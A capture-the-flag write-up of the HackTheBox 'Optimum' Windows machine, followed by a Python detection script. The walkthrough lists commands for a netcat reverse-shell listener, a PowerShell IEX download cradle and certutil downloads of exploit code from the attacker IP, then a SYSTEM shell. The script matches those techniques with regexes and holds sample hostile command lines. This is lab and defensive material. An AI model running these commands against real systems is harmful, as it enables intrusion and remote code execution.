Hackthebox - Optimum
Windows
Nmap
Port 80
If we Google it, we find this exploit right away
We need nc.exe on our attacking machine. Kali ships with Windows binaries, so we can just copy it into our working directory like this:
cp /usr/share/windows-resources/binaries/nc.exe .
We have to serve netcat using Python's HTTP server
python3 -m http.server 80
Then we have to modify the script and add our IP address and our port (I left 443)
We set a listener
rlwrap nc -lvp 443
We launch our exploit
python2 39161 10.10.10.8 80
Privesc
Win version
Kernel exploits
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -
Let's find an exploit other than the one mentioned by Sherlock (it does not work)
searchsploit ms16-032
Tried a few exploits but none worked
On Google I found this
And in the comment they mention this exe file
We download it to our Kali machine
Serve it with Python
certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe
We get it onto our target
We launch it and get a SYSTEM shell
We can grab the root flag
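Both file transfers used above (the PowerShell DownloadString cradle piped into `powershell -noprofile -`, and `certutil.exe -urlcache -f`) leave distinctive process command lines. As an added example, not part of the original writeup, this Python check flags them in process-creation logs; the rule names and the sample log lines are constructed for illustration.

```python
import re

# Heuristic rules (names are hypothetical) for the download techniques in this walkthrough.
RULES = {
    "certutil_urlcache_download": re.compile(
        r"\bcertutil(?:\.exe)?\b(?=.*[-/]urlcache\b)(?=.*\bhttps?://)", re.I),
    "powershell_download_cradle": re.compile(
        r"\b(?:IEX|Invoke-Expression)\b.*\bNet\.WebClient\b.*\.Download(?:String|File|Data)\s*\(", re.I),
    "powershell_script_from_stdin": re.compile(
        r"\bpowershell(?:\.exe)?\b[^|]*\s-\s*$", re.I),
}
URL = re.compile(r"https?://[^\s')]+", re.I)

def normalize(cmdline):
    """Drop cmd.exe caret escapes and double quotes that can split keywords."""
    return cmdline.replace("^", "").replace('"', "").strip()

def detect(cmdline):
    """Return (sorted rule names, URLs seen) for one process command line."""
    norm = normalize(cmdline)
    hits = sorted(name for name, rx in RULES.items() if rx.search(norm))
    return hits, (URL.findall(norm) if hits else [])

def scan(lines):
    """Return (line, hits, urls) for every command line that trips a rule."""
    results = [(line, *detect(line)) for line in lines]
    return [r for r in results if r[1]]

# Constructed sample command lines, shaped like process-creation CommandLine fields.
SAMPLES = [
    "cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -",
    "certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe",
    "c^ert^util -f -UrlCache http://10.10.14.3/41020.exe exploit.exe",
    r"certutil.exe -hashfile C:\Windows\System32\notepad.exe SHA256",  # benign use
    r"powershell -noprofile -File C:\Scripts\backup.ps1",              # benign use
]

if __name__ == "__main__":
    for line, hits, urls in scan(SAMPLES):
        print(hits, urls, "<-", line)
```

The same patterns apply to Sysmon Event ID 1 or Security event 4688 command-line fields, provided command-line auditing is enabled.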